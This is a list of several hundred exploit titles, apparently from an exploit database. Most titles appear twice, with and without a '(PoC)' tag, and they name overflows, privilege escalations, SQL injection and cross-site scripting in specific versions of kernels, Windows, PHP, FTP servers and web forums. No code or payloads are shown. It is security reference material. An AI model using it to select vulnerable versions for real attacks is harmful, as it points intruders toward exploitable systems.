QNAP NVR/NAS - Buffer Overflow
QNAP NVR/NAS - Buffer Overflow (PoC)
Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow
CDex 1.96 - Buffer Overflow
Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow (PoC)
CDex 1.96 - Buffer Overflow (PoC)

Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow
Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow (PoC)

D3DGear 5.00 Build 2175 - Buffer Overflow
D3DGear 5.00 Build 2175 - Buffer Overflow (PoC)
VX Search Enterprise 10.1.12 - Denial of Service
Disk Pulse Enterprise 10.1.18 - Denial of Service
Sync Breeze Enterprise 10.1.16 - Denial of Service
DiskBoss Enterprise 8.5.12 - Denial of Service
BarcodeWiz ActiveX Control < 6.7 - Buffer Overflow (PoC)

APNGDis 2.8 - 'filename' Stack Buffer Overflow
APNGDis 2.8 - 'filename' Stack Buffer Overflow (PoC)

wifirxpower - Local Buffer Overflow
wifirxpower - Local Buffer Overflow (PoC)
pinfo 0.6.9 - Local Buffer Overflow
Dmitry 1.3a - Local Buffer Overflow
pinfo 0.6.9 - Local Buffer Overflow (PoC)
Dmitry 1.3a - Local Buffer Overflow (PoC)

Mapscrn 2.03 - Local Buffer Overflow
Mapscrn 2.03 - Local Buffer Overflow (PoC)

Stunnel 3.24/4.00 - Daemon Hijacking (PoC)
Stunnel 3.24/4.00 - Daemon Hijacking

Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (PoC)
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1)
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (2)

Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator (PoC)
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator

WinZip - MIME Parsing Overflow (PoC)
WinZip - MIME Parsing Overflow
glFTPd (Slackware 9.0/9.1/10.0) - Local Stack Overflow (PoC)
GNU Sharutils 4.2.1 - Local Format String (PoC)
glFTPd (Slackware 9.0/9.1/10.0) - Local Stack Overflow
GNU Sharutils 4.2.1 - Local Format String
GD Graphics Library - Local Heap Overflow (PoC)
libxml 2.6.12 nanoftp - Buffer Overflow (PoC)
GD Graphics Library - Local Heap Overflow
libxml 2.6.12 nanoftp - Buffer Overflow

WinRAR 3.4.1 - Corrupt '.ZIP' File (PoC)
WinRAR 3.4.1 - Corrupt '.ZIP' File

Exim 4.41 - 'dns_build_reverse' Local (PoC)
Exim 4.41 - 'dns_build_reverse' Local
tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC)
Microsoft Windows - NtClose DeadLock (PoC) (MS06-030)
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (PoC) (MS06-030)
tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow
Microsoft Windows - NtClose DeadLock (MS06-030)
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030)

Microsoft Word 2000/2003 - Hlink Local Buffer Overflow (PoC)
Microsoft Word 2000/2003 - Hlink Local Buffer Overflow

Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)
Cheese Tracker 0.9.9 - Local Buffer Overflow

PHP 4.4.3/5.1.4 - 'objIndex' Local Buffer Overflow (PoC)
PHP 4.4.3/5.1.4 - 'objIndex' Local Buffer Overflow

BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow (PoC)
BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow

Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST (PoC)
Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST
PHP 4.4.6 - 'crack_opendict()' Local Buffer Overflow (PoC)
PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow (PoC)
PHP 4.4.6 - 'crack_opendict()' Local Buffer Overflow
PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow

PHP 4.4.6 - 'cpdf_open()' Local Source Code Disclosure (PoC)
PHP 4.4.6 - 'cpdf_open()' Local Source Code Disclosure
WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation (PoC)
Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak (PoC)
WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation
Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak

Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055)
Kodak Image Viewer - TIF/TIFF Code Execution (MS07-055)

Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow (PoC)
Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow

Microsoft Windows Media Player 6.4 - '.MP4' File Stack Overflow (PoC)
Microsoft Windows Media Player 6.4 - '.MP4' File Stack Overflow

DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak (PoC)
DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak

XnView 1.93.6 - '.taac' Local Buffer Overflow (PoC)
XnView 1.93.6 - '.taac' Local Buffer Overflow
OllyDBG 1.10 and ImpREC 1.7f - Export Name Buffer Overflow (PoC)
Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)
OllyDBG 1.10 and ImpREC 1.7f - Export Name Buffer Overflow
Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution

Microsoft Windows Server 2003 - Token Kidnapping Local (PoC)
Microsoft Windows Server 2003 - Token Kidnapping Local

Debian - Symlink In Login Arbitrary File Ownership (PoC)
Debian - Symlink In Login Arbitrary File Ownership

Trend Micro Internet Security Pro 2009 - Priviliege Escalation (PoC)
Trend Micro Internet Security Pro 2009 - Priviliege Escalation

Atomix Virtual Dj Pro 6.0 - Local Stack Buffer Overflow (PoC) (SEH)
Atomix Virtual Dj Pro 6.0 - Local Stack Buffer Overflow (SEH)

Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure (PoC)
Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure

Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow (PoC)
Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow

GPG2/Kleopatra 2.0.11 - Malformed Certificate (PoC)
GPG2/Kleopatra 2.0.11 - Malformed Certificate

Alleycode 2.21 - Local Overflow (SEH) (PoC)
Alleycode 2.21 - Local Overflow (SEH)

GPG4Win GNU - Privacy Assistant (PoC)
GPG4Win GNU - Privacy Assistant

VMware Fusion 2.0.5 - vmx86 kext Local (PoC)
VMware Fusion 2.0.5 - vmx86 kext Local

Mozilla Codesighs - Memory Corruption (PoC)
Mozilla Codesighs - Memory Corruption

Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow (PoC)
Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow

LDAP - Injection (PoC)
LDAP - Injection

QuickZip 4.x - '.zip' Local Universal Buffer Overflow (PoC)
QuickZip 4.x - '.zip' Local Universal Buffer Overflow
ZippHo 3.0.6 - '.zip' Local Stack Buffer Overflow (PoC)
Crimson Editor r3.70 - Overwrite (SEH) (PoC)
Kenward Zipper 1.4 - Local Stack Buffer Overflow (PoC)
ZippHo 3.0.6 - '.zip' Local Stack Buffer Overflow
Crimson Editor r3.70 - Overwrite (SEH)
Kenward Zipper 1.4 - Local Stack Buffer Overflow

Stud_PE 2.6.05 - Local Stack Overflow (PoC)
Stud_PE 2.6.05 - Local Stack Overflow

Zip Unzip 6.0 - '.zip' Local Stack Buffer Overflow (PoC)
Zip Unzip 6.0 - '.zip' Local Stack Buffer Overflow

EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Buffer Overflow (PoC)
EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Buffer Overflow

Easyzip 2000 3.5 - '.zip' Local Stack Buffer Overflow (PoC)
Easyzip 2000 3.5 - '.zip' Local Stack Buffer Overflow
PhotoFiltre Studio X - '.tif' Local Buffer Overflow (PoC)
Beyond Compare 3.0.13 b9599 - '.zip' Local Stack Buffer Overflow (PoC)
PhotoFiltre Studio X - '.tif' Local Buffer Overflow
Beyond Compare 3.0.13 b9599 - '.zip' Local Stack Buffer Overflow

Shellzip 3.0 Beta 3 - '.zip' Local Stack Buffer Overflow (PoC)
Shellzip 3.0 Beta 3 - '.zip' Local Stack Buffer Overflow

Audio Converter 8.1 - Local Stack Buffer Overflow (PoC)
Audio Converter 8.1 - Local Stack Buffer Overflow
Audio Converter 8.1 - Local Stack Buffer Overflow (PoC) ROP/WPM
SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow (PoC)
Audio Converter 8.1 - Local Stack Buffer Overflow ROP/WPM
SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow

BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overflow (PoC) (ASLR + DEP Bypass)
BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overflow (ASLR + DEP Bypass)

Acoustica Audio Converter Pro 1.1 (build 25) -  '.mp3 / .wav / .ogg / .wma' Local Heap Overflow (PoC)
Acoustica Audio Converter Pro 1.1 (build 25) - '.mp3 / .wav / .ogg / .wma' Local Heap Overflow

Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)
Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure

Oracle 10/11g - 'exp.exe?file' Local Buffer Overflow (PoC)
Oracle 10/11g - 'exp.exe?file' Local Buffer Overflow

PHP 5.3.6 - Local Buffer Overflow (ROP) (PoC)
PHP 5.3.6 - Local Buffer Overflow (ROP)

Xorg 1.4 < 1.11.2 - File Permission Change (PoC)
Xorg 1.4 < 1.11.2 - File Permission Change

Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - LSA Secrets

Linux Kernel 2.2.x - 'sysctl()' Memory Reading (PoC)
Linux Kernel 2.2.x - 'sysctl()' Memory Reading

Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) (PoC)
Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042)

Linux Kernel 2.2.x/2.3/2.4.x - 'd_path()' Path Truncation (PoC)
Linux Kernel 2.2.x/2.3/2.4.x - 'd_path()' Path Truncation

HT Editor 2.0.20 - Local Buffer Overflow (ROP) (PoC)
HT Editor 2.0.20 - Local Buffer Overflow (ROP)

Linux Kernel 2.4 - SUID 'execve()' System Call Race Condition Executable File Read (PoC)
Linux Kernel 2.4 - SUID 'execve()' System Call Race Condition Executable File Read

Linux Kernel 2.6 - Console Keymap Local Command Injection (PoC)
Linux Kernel 2.6 - Console Keymap Local Command Injection

ACE Stream Media 2.1 - 'acestream://' Format String (PoC)
ACE Stream Media 2.1 - 'acestream://' Format String

Linux Kernel 3.13 - SGID Privilege Escalation (PoC)
Linux Kernel 3.13 - SGID Privilege Escalation

Comodo Internet Security - HIPS/Sandbox Escape (PoC)
Comodo Internet Security - HIPS/Sandbox Escape

Palringo 2.8.1 - Local Stack Buffer Overflow (PoC)
Palringo 2.8.1 - Local Stack Buffer Overflow
Linux Kernel (x86-64) - Rowhammer Privilege Escalation (PoC)
Rowhammer - NaCl Sandbox Escape (PoC)
Linux Kernel (x86-64) - Rowhammer Privilege Escalation
Rowhammer - NaCl Sandbox Escape

Fedora 21 setroubleshootd 3.2.22 - Local Privilege Escalation (PoC)
Fedora 21 setroubleshootd 3.2.22 - Local Privilege Escalation

Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (PoC) (MS15-052)
Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (MS15-052)

Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)
Linux (x86) - Memory Sinkhole Privilege Escalation

Core FTP Server 1.2 - Local Buffer Overflow (PoC)
Core FTP Server 1.2 - Local Buffer Overflow

Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)
Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (MS16-051)

VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)
VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys'

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access Method)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (PoC) (Write Access Method)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)

GNU Screen 4.5.0 - Local Privilege Escalation (PoC)
GNU Screen 4.5.0 - Local Privilege Escalation
Man-db 2.6.7.1 - Local Privilege Escalation (PoC)
Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation (PoC)
Man-db 2.6.7.1 - Local Privilege Escalation
Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation

Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation (PoC)
Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation

TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)
TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change

Multiple CPUs - 'Spectre' Information Disclosure (PoC)
Multiple CPUs - 'Spectre' Information Disclosure

Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation

glibc ld.so - Memory Leak / Buffer Overflow
GNU C Library Dynamic Loader glibc ld.so - Memory Leak / Buffer Overflow

Microsoft IIS 5.0 - WebDAV Remote (PoC)
Microsoft IIS 5.0 - WebDAV Remote

Microsoft Windows Server 2000 - RSVP Server Authority Hijacking (PoC)
Microsoft Windows Server 2000 - RSVP Server Authority Hijacking

ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (4)

Titan FTP Server - Long Command Heap Overflow (PoC)
Titan FTP Server - Long Command Heap Overflow

SLX Server 6.1 - Arbitrary File Creation (PoC)
SLX Server 6.1 - Arbitrary File Creation

zgv 5.5 - Multiple Arbitrary Code Executions (PoC)
zgv 5.5 - Multiple Arbitrary Code Executions

Microsoft Internet Explorer - Remote Code Execution (PoC)
Microsoft Internet Explorer - Remote Code Execution

Exim 4.43 - 'auth_spa_server()' Remote (PoC)
Exim 4.43 - 'auth_spa_server()' Remote

Microsoft Windows - DTC Remote (PoC) (MS05-051) (2)
Microsoft Windows - DTC Remote (MS05-051) (2)

Watchfire AppScan QA 5.0.x - Remote Code Execution (PoC)
Watchfire AppScan QA 5.0.x - Remote Code Execution

KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow (PoC)
KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow

Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (2)
Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (MS06-005) (2)

RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow (PoC)
RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow

AIM Triton 1.0.4 - 'SipXtapi' Remote Buffer Overflow (PoC)
AIM Triton 1.0.4 - 'SipXtapi' Remote Buffer Overflow

Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution (PoC)
Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution

Easy File Sharing FTP Server 2.0 - 'PASS' Remote (PoC)
Easy File Sharing FTP Server 2.0 - 'PASS' Remote

BulletProof FTP Client 2.45 - Remote Buffer Overflow (PoC)
BulletProof FTP Client 2.45 - Remote Buffer Overflow

Intel Centrino ipw2200BG - Wireless Driver Remote Overflow (PoC)
Intel Centrino ipw2200BG - Wireless Driver Remote Overflow

WebMod 0.48 - Content-Length Remote Buffer Overflow (PoC)
WebMod 0.48 - Content-Length Remote Buffer Overflow

OpenBSD - ICMPv6 Fragment Remote Execution (PoC)
OpenBSD - ICMPv6 Fragment Remote Execution

Microsoft Internet Explorer 7 - Arbitrary File Rewrite (PoC) (MS07-027)
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027)

Apple Safari 3 for Windows Beta - Remote Command Execution (PoC)
Apple Safari 3 for Windows Beta - Remote Command Execution

Flash Player/Plugin Video - File Parsing Remote Code Execution (PoC)
Flash Player/Plugin Video - File Parsing Remote Code Execution

Apple QuickTime (Multiple Browsers) - Command Execution (PoC)
Apple QuickTime (Multiple Browsers) - Command Execution

Apple QuickTime /w IE .qtl Version XAS - Remote (PoC)
Apple QuickTime /w IE .qtl Version XAS - Remote

QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow (PoC)
QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow

ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)
ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod

HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method (PoC)
HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method

Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting (PoC)
Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting

Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal

MicroTik RouterOS 3.13 - SNMP write (Set request) (PoC)
MicroTik RouterOS 3.13 - SNMP write (Set request)

Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload (PoC)
Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload

Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)
Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution

Opera 9.61 - 'opera:historysearch' Code Execution (PoC)
Opera 9.61 - 'opera:historysearch' Code Execution

Chilkat Crypt - ActiveX Arbitrary File Creation/Execution (PoC)
Chilkat Crypt - ActiveX Arbitrary File Creation/Execution

Microsoft XML Core Services DTD - Cross-Domain Scripting (PoC) (MS08-069)
Microsoft XML Core Services DTD - Cross-Domain Scripting (MS08-069)

Google Chrome 1.0.154.46 - '(ChromeHTML://)' Injection (PoC)
Google Chrome 1.0.154.46 - '(ChromeHTML://)' Injection

GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption (PoC)
GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption

Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (PoC) (MS09-002)
Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)

Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC)
Zervit Web Server 0.4 - Directory Traversal / Memory Corruption

Apple Mac OSX - Java applet Remote Deserialization Remote (PoC) (2)
Apple Mac OSX - Java applet Remote Deserialization Remote (2)

VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow (PoC)
VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow

Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC) (MS09-054)
Microsoft Internet Explorer 5/6/7 - Memory Corruption (MS09-054)

Pegasus Mail Client 4.51 - Remote Buffer Overflow (PoC)
Pegasus Mail Client 4.51 - Remote Buffer Overflow

TLS - Renegotiation (PoC)
TLS - Renegotiation
Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)
Trend Micro Web-Deployment - ActiveX Remote Execution (PoC)
Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution
Trend Micro Web-Deployment - ActiveX Remote Execution

MX Simulator Server - Remote Buffer Overflow (PoC)
MX Simulator Server - Remote Buffer Overflow
Apache OFBiz - Remote Execution (via SQL Execution) (PoC)
Apache OFBiz - Admin Creator (PoC)
Apache OFBiz - Remote Execution (via SQL Execution)
Apache OFBiz - Admin Creator

Adobe Flash / Reader - Live Malware (PoC)
Adobe Flash / Reader - Live Malware

Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - 'SoftekATL.dll' Remote Buffer Overflow (PoC)
Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - 'SoftekATL.dll' Remote Buffer Overflow

KingView 6.5.3 - SCADA HMI Heap Overflow (PoC)
KingView 6.5.3 - SCADA HMI Heap Overflow

Microsoft Data Access Components - Remote Overflow (PoC) (MS11-002)
Microsoft Data Access Components - Remote Overflow (MS11-002)
HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution (PoC)
HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution (PoC)
HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution
HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution

Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC)
Solar FTP Server 2.1.1 - PASV Buffer Overflow

Apache mod_proxy - Reverse Proxy Exposure (PoC)
Apache mod_proxy - Reverse Proxy Exposure

Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite (PoC)
Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite

Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite (PoC)
Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite

Belkin G Wireless Router Firmware 5.00.12 - Remote Code Execution (PoC)
Belkin G Wireless Router Firmware 5.00.12 - Remote Code Execution

OpenVAS Manager 4.0 - Authentication Bypass (PoC)
OpenVAS Manager 4.0 - Authentication Bypass

w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)
w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution

Legend Perl IRC Bot - Remote Code Execution (PoC)
Legend Perl IRC Bot - Remote Code Execution

dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock)
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)

WebDrive 12.2 (Build #4172) - Remote Buffer Overflow (PoC)
WebDrive 12.2 (Build #4172) - Remote Buffer Overflow

Endian Firewall < 3.0.0 - OS Command Injection (Python) (PoC)
Endian Firewall < 3.0.0 - OS Command Injection (Python)

Fortigate OS 4.x < 5.0.7 - SSH Backdoor Access

OpenSSHd 7.2p2 - Username Enumeration (PoC)
OpenSSHd 7.2p2 - Username Enumeration

Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution

Intel Active Management Technology - System Privileges

Xplico - Remote Code Execution (Metasploit)

Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution

S9Y Serendipity 0.7-beta1 - SQL Injection (PoC)
S9Y Serendipity 0.7-beta1 - SQL Injection

AWStats 5.7 < 6.2 - Multiple Remote (PoC)
AWStats 5.7 < 6.2 - Multiple Remote

WoltLab Burning Book 1.1.2 - SQL Injection (PoC)
WoltLab Burning Book 1.1.2 - SQL Injection

Invision Power Board 2.1.7 - ACTIVE Cross-Site Scripting / SQL Injection
Invision Power Board (IP.Board) 2.1.7 - 'ACTIVE' Cross-Site Scripting / SQL Injection

EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC)
EQdkp 1.3.2f - 'user_id' Authentication Bypass

Invision Power Board 2.3.5 - Multiple Vulnerabilities (2)
Invision Power Board (IP.Board) 2.3.5 - Multiple Vulnerabilities (2)

FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)
FOSS Gallery Public 1.0 - Arbitrary File Upload

Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC)
Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection

Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC)
Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation

Invision Power Board 3.0.0b5 - Active Cross-Site Scripting / Full Path Disclosure
Invision Power Board (IP.Board) 3.0.0b5 - Active Cross-Site Scripting / Full Path Disclosure

Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption (PoC)
Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption

IPB (nv2) Awards < 1.1.0 - SQL Injection (PoC)
IPB (nv2) Awards < 1.1.0 - SQL Injection

X-Cart Pro 4.0.13 - SQL Injection (PoC)
X-Cart Pro 4.0.13 - SQL Injection

Simple Machines Forum (SMF) 1.1.8 - 'avatar' Remote PHP File Execute (PoC)
Simple Machines Forum (SMF) 1.1.8 - 'avatar' Remote PHP File Execute

IPB 3.0.1 - SQL Injection
Invision Power Board 3.0.1 - SQL Injection

WebsiteBaker 2.8.1 - Cross-Site Request Forgery (PoC)
WebsiteBaker 2.8.1 - Cross-Site Request Forgery
BS Auto Classifieds - 'info.php' SQL Injection (PoC)
BS Business Directory - 'articlesdetails.php' SQL Injection (PoC)
BS Classifieds Ads - 'articlesdetails.php' SQL Injection (PoC)
BS Events Directory - 'articlesdetails.php' SQL Injection (PoC)
BS Auto Classifieds - 'info.php' SQL Injection
BS Business Directory - 'articlesdetails.php' SQL Injection
BS Classifieds Ads - 'articlesdetails.php' SQL Injection
BS Events Directory - 'articlesdetails.php' SQL Injection

BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)
BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password)

Exponent CMS 2.0 Beta 1.1 - Cross-Site Request Forgery (Add Administrator Account) (PoC)
Exponent CMS 2.0 Beta 1.1 - Cross-Site Request Forgery (Add Administrator Account)

SWAT Samba Web Administration Tool - Cross-Site Request Forgery (PoC)
SWAT Samba Web Administration Tool - Cross-Site Request Forgery

Plone and Zope - Remote Command Execution (PoC)
Plone and Zope - Remote Command Execution

Invision Power Board 1.0/1.1/1.2 - 'admin.php' Cross-Site Scripting
Invision Power Board (IP.Board) 1.0/1.1/1.2 - 'admin.php' Cross-Site Scripting

Invision Power Board 1.x - 'index.php' showtopic Cross-Site Scripting
Invision Power Board (IP.Board) 1.x - 'index.php' showtopic Cross-Site Scripting

Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities
Invision Power Board (IP.Board) 1.3 - Multiple Cross-Site Scripting Vulnerabilities

Invision Power Board 1.3 - 'Pop' Cross-Site Scripting
Invision Power Board (IP.Board) 1.3 - 'Pop' Cross-Site Scripting

Invision Power Board 1.3 - 'SSI.php' Cross-Site Scripting
Invision Power Board (IP.Board) 1.3 - 'SSI.php' Cross-Site Scripting

Invision Power Services Invision Board 2.0.4 - Search Action Multiple Cross-Site Scripting Vulnerabilities
Invision Power Board (IP.Board) 2.0.4 - Search Action Multiple Cross-Site Scripting Vulnerabilities

Invision Power Board 1.x/2.0.3 - SML Code Script Injection
Invision Power Board (IP.Board) 1.x/2.0.3 - SML Code Script Injection

IPB (Invision Power Board) 1.x?/2.x/3.x - Admin Account Takeover
Invision Power Board 1.x?/2.x/3.x - Admin Account Takeover

Invision Power Board 2.0.3/2.1 - 'Act' Cross-Site Scripting
Invision Power Board (IP.Board) 2.0.3/2.1 - 'Act' Cross-Site Scripting

Invision Power Board 1.0.3 - Attached File Cross-Site Scripting
Invision Power Board (IP.Board) 1.0.3 - Attached File Cross-Site Scripting

Invision Power Services Invision Board 2.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities
Invision Power Board (IP.Board) 2.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities

Invision Power Services Invision Board 2.0.4 - 'index.php?st' Cross-Site Scripting
Invision Power Board (IP.Board) 2.0.4 - 'index.php?st' Cross-Site Scripting

Invision Power Services Invision Board 2.0.4 - Calendar Action Multiple Cross-Site Scripting Vulnerabilities
Invision Power Board (IP.Board) 2.0.4 - Calendar Action Multiple Cross-Site Scripting Vulnerabilities
Invision Power Services Invision Board 2.0.4 - Print Action 't' Cross-Site Scripting
Invision Power Services Invision Board 2.0.4 - Mail Action 'MID' Cross-Site Scripting
Invision Power Services Invision Board 2.0.4 - Help Action 'HID' Cross-Site Scripting
Invision Power Board (IP.Board) 2.0.4 - Print Action 't' Cross-Site Scripting
Invision Power Board (IP.Board) 2.0.4 - Mail Action 'MID' Cross-Site Scripting
Invision Power Board (IP.Board) 2.0.4 - Help Action 'HID' Cross-Site Scripting

Invision Power Board 1.x/2.x - Multiple SQL Injections
Invision Power Board (IP.Board) 1.x/2.x - Multiple SQL Injections

Invision Power Board 3.0 - Multiple HTML Injection / Information Disclosure Vulnerabilities
Invision Power Board (IP.Board) 3.0 - Multiple HTML Injection / Information Disclosure Vulnerabilities

Invision Power Board 3.0.3 - '.txt' MIME-Type Cross-Site Scripting
Invision Power Board (IP.Board) 3.0.3 - '.txt' MIME-Type Cross-Site Scripting

IP Board 3.x - Cross-Site Request Forgery / Token Hjiacking
Invision Power Board (IP.Board) 3.x - Cross-Site Request Forgery / Token Hjiacking

Invision Power Board 4.2.1 - 'searchText' Cross-Site Scripting
Invision Power Board (IP.Board) 4.2.1 - 'searchText' Cross-Site Scripting

